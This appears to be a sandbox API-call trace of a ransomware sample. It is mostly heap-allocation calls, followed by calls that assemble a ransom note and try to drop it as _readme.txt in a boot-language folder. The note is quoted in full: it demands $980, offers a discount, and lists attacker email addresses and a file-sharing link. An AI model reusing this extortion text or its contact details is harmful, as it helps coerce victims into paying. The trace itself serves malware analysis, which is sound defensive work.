Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.856] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0178.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.856] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0178.856] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0178.856] PathFindFileNameW (pszPath="") returned="" [0178.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.856] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0178.857] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0178.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0178.857] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0178.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0178.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.858] FreeLibrary (hLibModule=0x759d0000) returned 1 [0178.858] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0178.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.858] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0178.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0178.859] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0178.859] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0178.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0178.859] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0178.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0178.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.861] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*" (normalized: "c:\\boot\\fi-fi\\*"), lpFindFileData=0x30ffba4 | out: 